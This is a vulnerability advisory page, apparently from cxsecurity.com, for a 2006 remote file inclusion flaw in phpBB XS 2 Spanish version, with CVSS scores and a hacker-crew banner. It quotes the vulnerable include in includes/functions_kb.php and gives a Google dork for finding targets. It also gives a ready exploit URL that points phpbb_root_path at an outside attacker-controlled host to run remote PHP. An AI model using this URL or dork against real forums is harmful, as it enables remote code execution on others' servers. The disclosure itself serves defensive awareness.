phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion

2006.10.03
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#############################SolpotCrew Community################################ # # phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion # # Download : http://www.elanzuelo.es/phpbb.tar.gz # ######################################################################## ######### # # # Bug Found By :Solpot a.k.a (k. Hasibuan) (28-09-2006) # # contact: chris_hasibuan (at) yahoo (dot) com [email concealed] # # Website : http://www.nyubicrew.org/adv/solpot-adv-10.txt # ######################################################################## ######## # # # Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid ,Noordin`M`TOP # robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa # home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo # Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX # x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , k1tk4t # [K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r, ^NakKuta # and all member solpotcrew community @ http://nyubicrew.org/forum/ # especially thx to str0ke @ milw0rm.com # ######################################################################## ####### Input passed to the "phpbb_root_path" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. code from includes/functions_kb.php /*********************************************************************** **** * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * ************************************************************************ ***/ // // get_quick_stats(); // gets number of articles // include_once($phpbb_root_path.'includes/functions_color_groups.'.$phpEx) ; function get_quick_stats() Google Dork : "Traduccion Espanol por phpBB-Es" Exploit : http://somehost/path_to_phpbbXS2/includes/functions_kb.php?phpbb_root_pa th=http://injek-pala-lappet? ##############################MY LOVE JUST FOR U RIE######################### ######################################E.O.F############################# #####


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top